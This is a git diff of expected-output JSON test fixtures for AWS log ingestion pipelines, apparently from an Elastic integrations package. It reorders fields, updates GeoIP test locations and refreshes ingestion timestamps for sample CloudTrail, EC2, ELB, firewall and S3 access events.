@@ -104,6 +97,10 @@ "Bob" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:54Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"status\":\"Inactive\",\"userName\":\"Bob\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\"},\"responseElements\":null,\"requestID\":\"EXAMPLE-32f3-4a92-82e1-EXAMPLE\",\"eventID\":\"EXAMPLE-5c88-4652-9ee9-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -158,7 +155,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json index 754605022ee..2b62a062c54 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-trail-json.log-expected.json 
@@ -1,17 +1,32 @@ { "expected": [ { + "cloud": { + "region": "us-east-2", + "account": { + "id": "123456789012" + } + }, + "@timestamp": "2016-07-14T19:15:45.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "Alice" + ] + }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -23,24 +38,6 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "cloud": { - "region": "us-east-2", - "account": { - "id": "123456789012" - } - }, - "@timestamp": "2016-07-14T19:15:45.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "Alice" - ] - }, "event": { "original": "{\"eventVersion\":\"1.04\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2016-07-14T19:15:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-east-2\",\"sourceIPAddress\":\"89.160.20.156\",\"userAgent\":\"aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22\",\"errorCode\":\"TrailNotFoundException\",\"errorMessage\":\"Unknown trail: myTrail2 for the user: 123456789012\",\"requestParameters\":{\"name\":\"myTrail2\"},\"responseElements\":null,\"requestID\":\"5d40662a-49f7-11e6-97e4-dEXAMPLE\",\"eventID\":\"b7d4398e-b2f0-4faa-9c76-e2EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "provider": "cloudtrail.amazonaws.com", 
@@ -85,16 +82,12 @@ "name": "Spider" }, "version": "1.10.32" - } - }, - { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "cloud": { "region": "us-west-2", "account": { @@ -110,6 +103,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"sessionIssuer\":{},\"webIdFederationData\":{},\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-08T15:12:16Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-08T20:58:45Z\",\"eventSource\":\"cloudtrail.amazonaws.com\",\"eventName\":\"UpdateTrail\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"name\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"s3BucketName\":\"test-cloudtrail-bucket\",\"snsTopicName\":\"\",\"isMultiRegionTrail\":true,\"enableLogFileValidation\":false,\"kmsKeyId\":\"\"},\"responseElements\":{\"name\":\"TEST-trail\",\"s3BucketName\":\"test-cloudtrail-bucket\",\"snsTopicName\":\"\",\"snsTopicARN\":\"\",\"includeGlobalServiceEvents\":true,\"isMultiRegionTrail\":true,\"trailARN\":\"arn:aws:cloudtrail:us-west-2:0123456789012:trail/TEST-trail\",\"logFileValidationEnabled\":false,\"isOrganizationTrail\":false},\"requestID\":\"EXAMPLE-f3da-42d1-84f5-EXAMPLE\",\"eventID\":\"EXAMPLE-b5e9-4846-8407-EXAMPLE\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "cloudtrail.amazonaws.com", @@ -167,7 +164,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file 
diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-user-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-user-json.log-expected.json index e324600a271..b9fcec54dfa 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-user-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-update-user-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -25,6 +18,10 @@ "Robert" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EX_PRINCIPAL_ID\",\"arn\":\"arn:aws:iam::123456789012:user/Alice\",\"accountId\":\"123456789012\",\"accessKeyId\":\"EXAMPLE_KEY_ID\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-08T20:53:12Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UpdateUser\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"requestParameters\":{\"userName\":\"Bob\",\"newUserName\":\"Robert\"},\"responseElements\":null,\"requestID\":\"3a6b3260-739d-465e-9406-bcEXAMPLE\",\"eventID\":\"9150d546-3564-4262-8e62-110EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"123456789012\"}", "provider": "iam.amazonaws.com", @@ -77,7 +74,10 @@ "name": "Spider" }, "version": "1.16.310" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json index 63e08a3cb3f..9d41f0e7469 100644 
--- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-upload-ssh-public-key-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"EXAMPLE_ID\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2020-01-10T14:38:30Z\"}},\"invokedBy\":\"signin.amazonaws.com\"},\"eventTime\":\"2020-01-10T16:06:40Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"UploadSSHPublicKey\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"signin.amazonaws.com\",\"requestParameters\":{\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\",\"userName\":\"Alice\"},\"responseElements\":{\"sSHPublicKey\":{\"fingerprint\":\"de:ad:c0:de:de:ad:c0:de:de:ad:c0:de:de:ad:c0:de\",\"status\":\"Active\",\"uploadDate\":\"Jan 10, 2020 4:06:40 PM\",\"userName\":\"Alice\",\"sSHPublicKeyId\":\"EXAMPLE_KEY_ID\",\"sSHPublicKeyBody\":\"ssh-rsa AAAAdeadcodedeadcode Alice@localhost.domain\"}},\"requestID\":\"EXAMPLE-44b9-41cd-90f2-EXAMPLE\",\"eventID\":\"EXAMPLE-9a9d-4da4-9998-EXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -81,7 +78,10 @@ "name": "Other" }, "original": "signin.amazonaws.com" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file 
diff --git a/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json b/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json index 8e4cce3a5fd..114c5c4a587 100644 --- a/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json +++ b/packages/aws/data_stream/cloudwatch_logs/_dev/test/pipeline/test-cloudwatch-ec2.log-expected.json @@ -6,7 +6,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525004600Z", + "ingested": "2021-12-14T14:35:28.992374624Z", "original": "2020-02-20T07:01:01.000Z Feb 20 07:01:01 ip-172-31-81-156 systemd: Stopping User Slice of root." }, "aws": { @@ -24,7 +24,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525012700Z", + "ingested": "2021-12-14T14:35:28.992377584Z", "original": "2020-02-20T07:02:18.000Z Feb 20 07:02:18 ip-172-31-81-156 dhclient[3000]: XMT: Solicit on eth0, interval 125240ms." }, "aws": { @@ -42,7 +42,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525017900Z", + "ingested": "2021-12-14T14:35:28.992378119Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPREQUEST on eth0 to 172.31.80.1 port 67 (xid=0x4575af22)" }, "aws": { @@ -60,7 +60,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525022500Z", + "ingested": "2021-12-14T14:35:28.992378558Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPACK from 172.31.80.1 (xid=0x4575af22)" }, "aws": { @@ -78,7 +78,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525027400Z", + "ingested": "2021-12-14T14:35:28.992378947Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: bound to 172.31.81.156 -- renewal in 1599 seconds." }, "aws": { 
@@ -96,7 +96,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.525032300Z", + "ingested": "2021-12-14T14:35:28.992379348Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 ec2net: [get_meta] Trying to get http://169.254.169.254/latest/meta-data/network/interfaces/macs/12:e2:a9:95:8b:97/local-ipv4s" }, "aws": { diff --git a/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json b/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json index 4298569cb31..7872ea4914b 100644 --- a/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json +++ b/packages/aws/data_stream/ec2_logs/_dev/test/pipeline/test-ec2.log-expected.json @@ -9,7 +9,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684169900Z", + "ingested": "2021-12-14T14:35:29.134744491Z", "original": "2020-02-20T07:01:01.000Z Feb 20 07:01:01 ip-172-31-81-156 systemd: Stopping User Slice of root." }, "aws": { @@ -31,7 +31,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684178100Z", + "ingested": "2021-12-14T14:35:29.134746939Z", "original": "2020-02-20T07:02:18.000Z Feb 20 07:02:18 ip-172-31-81-156 dhclient[3000]: XMT: Solicit on eth0, interval 125240ms." }, "aws": { @@ -53,7 +53,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684183300Z", + "ingested": "2021-12-14T14:35:29.134747436Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPREQUEST on eth0 to 172.31.80.1 port 67 (xid=0x4575af22)" }, "aws": { @@ -75,7 +75,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684188400Z", + "ingested": "2021-12-14T14:35:29.134747825Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: DHCPACK from 172.31.80.1 (xid=0x4575af22)" }, "aws": { 
@@ -97,7 +97,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684193500Z", + "ingested": "2021-12-14T14:35:29.134748227Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 dhclient[2898]: bound to 172.31.81.156 -- renewal in 1599 seconds." }, "aws": {
@@ -119,7 +119,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T16:11:58.684198500Z", + "ingested": "2021-12-14T14:35:29.134748596Z", "original": "2020-02-20T07:02:37.000Z Feb 20 07:02:37 ip-172-31-81-156 ec2net: [get_meta] Trying to get http://169.254.169.254/latest/meta-data/network/interfaces/macs/12:e2:a9:95:8b:97/local-ipv4s" }, "aws": {
diff --git a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json
index baf96cc0f76..e6fae20880b 100644
--- a/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json
+++ b/packages/aws/data_stream/elb_logs/_dev/test/pipeline/test-alb.log-expected.json
@@ -43,7 +43,7 @@ } }, "event": { - "ingested": "2021-12-09T16:11:58.868846100Z", + "ingested": "2021-12-14T14:35:29.298563618Z", "original": "http 2018-07-02T22:23:00.186641Z app/my-loadbalancer/50dc6c495c0c9188 192.168.131.39:2817 10.0.0.1:80 0.000 0.001 0.000 200 200 34 366 \"GET http://www.example.com:80/ HTTP/1.1\" \"curl/7.46.0\" - - arn:aws:elasticloadbalancing:us-east-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067 \"Root=1-58337262-36d228ad5d99923122bbe354\" \"-\" \"-\" 0 2018-07-02T22:22:48.364000Z \"forward,redirect\" \"-\" \"-\" \"10.0.0.1:80\" \"200\" \"-\" \"-\"", "kind": "event", "start": "2018-07-02T22:22:48.364000Z",
diff --git a/packages/aws/data_stream/firewall_logs/_dev/test/pipeline/test-firewall.log-expected.json b/packages/aws/data_stream/firewall_logs/_dev/test/pipeline/test-firewall.log-expected.json
index cb936390d85..20d23b35576 100644
--- a/packages/aws/data_stream/firewall_logs/_dev/test/pipeline/test-firewall.log-expected.json
+++ b/packages/aws/data_stream/firewall_logs/_dev/test/pipeline/test-firewall.log-expected.json
@@ -4,21 +4,18 @@ "destination": { "geo": { "continent_name": "North America", - "region_iso_code": "US-ID", - "city_name": "Salmon", + "region_iso_code": "US-WA", + "city_name": "Milton", "country_iso_code": "US", "country_name": "United States", - "region_name": "Idaho", + "region_name": "Washington", "location": { - "lon": -113.8784, - "lat": 45.1571 + "lon": -122.3149, + "lat": 47.2513 } }, "as": { - "number": 209, - "organization": { - "name": "CenturyLink Communications, LLC" - } + "number": 209 }, "address": "216.160.83.57", "port": 80,
@@ -32,20 +29,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143",
@@ -128,14 +119,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": {
@@ -151,21 +142,18 @@ "source": { "geo": { "continent_name": "North America", - "region_iso_code": "US-ID", - "city_name": "Salmon", + "region_iso_code": "US-WA", + "city_name": "Milton", "country_iso_code": "US", "country_name": "United States", - "region_name": "Idaho", + "region_name": "Washington", "location": { - "lon": -113.8784, - "lat": 45.1571 + "lon": -122.3149, + "lat": 47.2513 } }, "as": { - "number": 209, - "organization": { - "name": "CenturyLink Communications, LLC" - } + "number": 209 }, "address": "216.160.83.61", "port": 61953,
diff --git a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json
index abd3a9e4751..87871764470 100644
--- a/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json
+++ b/packages/aws/data_stream/s3access/_dev/test/pipeline/test-s3-server-access.log-expected.json
@@ -11,14 +11,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": {
@@ -61,7 +61,7 @@ }, "event": { "duration": 17000000, - "ingested": "2021-12-09T16:11:59.134194800Z", + "ingested": "2021-12-14T14:35:30.078202808Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION",
@@ -118,14 +118,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": {
@@ -168,7 +168,7 @@ }, "event": { "duration": 3000000, - "ingested": "2021-12-09T16:11:59.134198700Z", + "ingested": "2021-12-14T14:35:30.078205536Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION",
@@ -225,14 +225,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": {
@@ -275,7 +275,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-12-09T16:11:59.134204100Z", + "ingested": "2021-12-14T14:35:30.078206039Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.BUCKET",
@@ -333,14 +333,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": {
@@ -383,7 +383,7 @@ }, "event": { "duration": 4000000, - "ingested": "2021-12-09T16:11:59.134208400Z", + "ingested": "2021-12-14T14:35:30.078206436Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION",
@@ -430,19 +430,16 @@ } }, { - "tags": [ - "preserve_original_event" - ], "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": {
@@ -477,7 +474,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T16:11:59.134212900Z", + "ingested": "2021-12-14T14:35:30.078206822Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", "kind": "event", "action": "BATCH.DELETE.OBJECT",
@@ -506,22 +503,22 @@ "key": "jolokia-war-1.5.0.war", "object_size": 344017 } - } - }, - { "tags": [ "preserve_original_event" - ], + ] + }, + { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "cloud": {
@@ -556,7 +553,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T16:11:59.134217300Z", + "ingested": "2021-12-14T14:35:30.078207213Z", "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "BATCH.DELETE.OBJECT",
@@ -585,17 +582,12 @@ "key": "Screen+Shot+2019-09-09+at+9.08.44+AM.png", "object_size": 57138 } - } - }, - { - "url": { - "path": "/AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz", - "extension": "gz", - "original": "/AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "cloud": { "provider": "aws" },
